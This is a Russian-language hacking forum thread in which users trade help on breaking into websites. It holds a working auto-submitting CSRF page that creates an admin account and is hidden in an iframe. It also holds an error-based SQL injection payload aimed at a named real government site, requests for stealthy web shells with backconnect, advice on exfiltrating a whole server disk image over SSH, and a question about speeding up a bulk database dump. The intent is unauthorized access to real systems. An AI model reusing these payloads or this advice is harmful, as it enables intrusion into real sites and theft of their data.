Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Нашёл на сайте Uploader по ссылке сайт/js/uploadify-2.3/ как-то так,неважно
    В заголовке написано Uplodify Test .
    При переходе видна лишь кнопка SELECT,заливаю shell пишет что загружено,
    Но точно ли он загружает или для виду,это же,типо тест...
    А если и загружает то куда,непонятно.Как узнать?

    И ещё вопрос я попал на FTP
    ftp://***-***-***-**.*****.******.***
    Могу всякие файлы читать,но файлов слишком много,аж лагает .
    Есть ли какие-нибудь программы для скана директорий FTP?
     
    #2001 SaNDER, 17 Jul 2017
    Last edited: 17 Jul 2017
  2. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    516
    Likes Received:
    473
    Reputations:
    145
    1) Брутить стандартные пути папки upload, images, avatrs и прочее у можно dirb'у скормить словарь. Второй потыкать форум на предмет FPD(Открытие пути файла), Третий, скачать фреймворк с паблика и посмотреть куда он льет по дефолту.
     
    _________________________
    ghost8 likes this.
  3. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    444
    Likes Received:
    80
    Reputations:
    20
    Изучал атаку xss через svg все показалось просто но почему на том же hackerone такие атаки мение цены чем стандартные xss на томже ютубе ненахожу примеры кражи куков через svg, я что то недопонимаю ?
     
  4. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    576
    Likes Received:
    46
    Reputations:
    0
    Говорит ли наличие такой ошибки о sql-inj?
    Code:
    syntax error, unexpected '@', expecting $end|Gdn_Database|Query|select * from ( select match(d.Name, d.Body) against(:Search0 in boolean mode) as `Relavence`, d.DiscussionID as `PrimaryID`, d.Name as `Title`, d.Body as `Summary`, d.Format as `Format`, d.CategoryID as `CategoryID`, concat('/discussion/', d.DiscussionID) as `Url`, d.DateInserted as `DateInserted`, d.InsertUserID as `UserID`, 'Discussion' as `RecordType` from GDN_Discussion d where match(d.Name, d.Body) against (:Search1 in boolean mode) union all select match(c.Body) against(:Search2 in boolean mode) as `Relavence`, c.CommentID as `PrimaryID`, d.Name as `Title`, c.Body as `Summary`, c.Format as `Format`, d.CategoryID as `CategoryID`, concat('/discussion/comment/', c.CommentID, '/#Comment_', c.CommentID) as `Url`, c.DateInserted as `DateInserted`, c.InsertUserID as `UserID`, 'Comment' as `RecordType` from GDN_Comment c join GDN_Discussion d on d.DiscussionID = c.DiscussionID where match(c.Body) against (:Search3 in boolean mode) ) s order by s.DateInserted desc limit 20
     
  5. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    не обязательно.
     
  6. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Как подключиться к InterBase?
    Логин и пароль знаю,а как подключиться нет .
    IBConsole запустил и понять в ней ничего не могу.Версия новая .
     
    #2006 SaNDER, 28 Jul 2017
    Last edited: 28 Jul 2017
  7. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    195
    Likes Received:
    17
    Reputations:
    0
    Подскажите webshell для windows с backconnect'ом в комплекте
    PS на сервере php,node
    или отдельно backconnect с примером его запуска
     
  8. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    444
    Likes Received:
    80
    Reputations:
    20
    Делаю POST CSRF
    Code:
    <html>
    <body onload="document.csrf.submit()">
    <form action="http://site/cp/newuser/" name="csrf" method="POST">
    <input type="hidden" name="login" value="hack">
    <input type="hidden" name="newp" value="hack">
    <input type="hidden" name="newp1" value="hack">
    </form>
    </body>
    </html>
    Все срабатывает отлично но после атаки админа редиректит в /users/ и он спалит нового админа так вот как поменять и этот редирект?
     
  9. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    495
    Likes Received:
    868
    Reputations:
    312
    Редирект ты вряд ли сможешь упразднить, но оно и не нужно. CSRF обычно в ифрейм прячется, примерно так будет выглядеть:

    PHP:
    <html>
    <
    head>
    <
    title>CSRF</title>
    </
    head>
       <
    body onload='document.forms.csrf.submit();'>
         <
    form action="http://site/cp/newuser/" name="csrf" method="POST" target="iframe">
           <
    input type="hidden" name="login" value="hack">
           <
    input type="hidden" name="newp" value="hack">
           <
    input type="hidden" name="newp1" value="hack">
         </
    form>
         <
    iframe src="" style="display:none;" name="iframe" id="iframe"></iframe>
       </
    body>
    </
    html>
     
  10. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    195
    Likes Received:
    17
    Reputations:
    0
    Имеется root на сервере
    Code:
    root@server:# uname -a
    Linux server 4.4.0-79-generic #100-Ubuntu SMP Wed May 17 19:58:14 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
    
    root@server:# df -h
    Filesystem      Size  Used Avail Use% Mounted on
    udev            490M     0  490M   0% /dev
    tmpfs           100M   11M   89M  11% /run
    /dev/vda1        30G   18G   12G  60% /
    tmpfs           497M     0  497M   0% /dev/shm
    tmpfs           5.0M     0  5.0M   0% /run/lock
    tmpfs           497M     0  497M   0% /sys/fs/cgroup
    tmpfs           100M     0  100M   0% /run/user/0
    
    root@server:# lsblk -a
    NAME   MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
    vda    253:0    0  30G  0 disk
    └─vda1 253:1    0  30G  0 part /
    loop0    7:0    0       0 loop
    loop1    7:1    0       0 loop
    loop2    7:2    0       0 loop
    loop3    7:3    0       0 loop
    loop4    7:4    0       0 loop
    loop5    7:5    0       0 loop
    loop6    7:6    0       0 loop
    loop7    7:7    0       0 loop
    
    
    Подскажите как имея ssh сделать образ/backup удаленной машины (то есть всей системы/hdd)?
    И скачать налету упакованный образ/архив (при условии если места не хватит)
    В последствии поднять данный образ в VM
     
  11. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    495
    Likes Received:
    868
    Reputations:
    312
    Как вариант, сделать образ диска, с сохранением на удалённую машину, через SSH:
    Code:
    dd if=/dev/vda | ssh root@yourserver.com -p22 "cat > vda_image"
    
    А потом гуглить "dd image to vm" и пробовать заводить этот образ :)
     
    Gorev, kacergei, ms13 and 1 other person like this.
  12. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    195
    Likes Received:
    17
    Reputations:
    0
    Ранее с таким не сталкивался, потому вопрос может быть очень глупым
    )))
    Выполняю это на удаленной машине, что бы сохранить файл на свой ПК (указывая его как удалённый)
    "cat > vda_image" я правильно понял что могу указать папку сохранения своего ПК, для примера: dd if=/dev/vda | ssh root@xxx.xxx.xxx.xx -p22 "cat > /root/folder_on_my_computer/vda_image_file"
    Я верно понял?
    P.S> как узнать предположительный размер конечного файла?
    Дабы решить на какую удаленную лить (место не резиновое =) )
     
  13. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    805
    Reputations:
    90
    смонтируй директорию(хоть корень) через sshfs
    Code:
    sshfs user@hostname:/remote/path /sshfs_local_folder
    
    и работай как с локальной системой, tar там или ещё чего, создать iso можно так
    Code:
    mkisofs -lJR -o output_image.iso sshfs_local_folder
    
    по идее должно работать
     
    _________________________
    crlf likes this.
  14. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    495
    Likes Received:
    868
    Reputations:
    312
    Да, можно указать любой путь на удалённой машине. Судя по df -h /dev/vda1 имеет размер 30G, образ будет такого же размера. Можно ещё попутно жать gzip-ом, размер должен быть меньше.
     
    t0ma5 likes this.
  15. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,012
    Likes Received:
    1,361
    Reputations:
    43
    Цветные, помогите
    Code:
    http://health.ri.gov/licenses/detail.php?id=248++1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 
     
  16. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    376
    Likes Received:
    343
    Reputations:
    99
    Code:
    detail.php?id=248=0 group by mid(version(),rand(0)|0)having min(0)-- -
    Как вариант вывести через ошибку БД, но не забывай заключать оператор select в /*!select*/, там на него ругается!
     
    palec2006, man474019, Gorev and 2 others like this.
  17. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,012
    Likes Received:
    1,361
    Reputations:
    43
    Спасибо, а можешь любую таблицу вывести, а то я не оч понимаю этот синтекс, а так по твоему примеру буду пробовать разбираться. Спасибо.
     
  18. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    805
    Reputations:
    90
    там всё что после /**/ как будто не уходит в запрос :(
    ?id=248/**/werwer - валидная страница
    ?id=248=0 group by mid(/*!select(version())*/,rand(0)|0)having min(0)-- - - запрос падает
     
    _________________________
    BabaDook likes this.
  19. GYK

    GYK New Member

    Joined:
    7 Aug 2017
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, я бы хотел узнать об XSS уязвимостях, а именно как их использовать, если стоит фильтр, просто алерт работает а вот более сложные скрипты со сниффером - фильтруются, и еще на счет сниффера, есть ли такие, которые работают, когда жертва просто видит картинку, и нажатия не требуется, я в этом плохо разбираюсь, также на счет шелка, есть ли беспалевные, просто на какой бы хостинг я бы не ставил, тут же блокируют, или шелл просто ее работает, может хостинги сеть, на которых они не садятся какие-то?
     
  20. r1l

    r1l New Member

    Joined:
    19 Jan 2016
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Нашел жирный сайт, по после 200к(фул 1.3кк) строк слива очень падает скорость до нереальной
    Что можно предпринять, что бы хоть как то заставить сливаться быстрее?
     
Loading...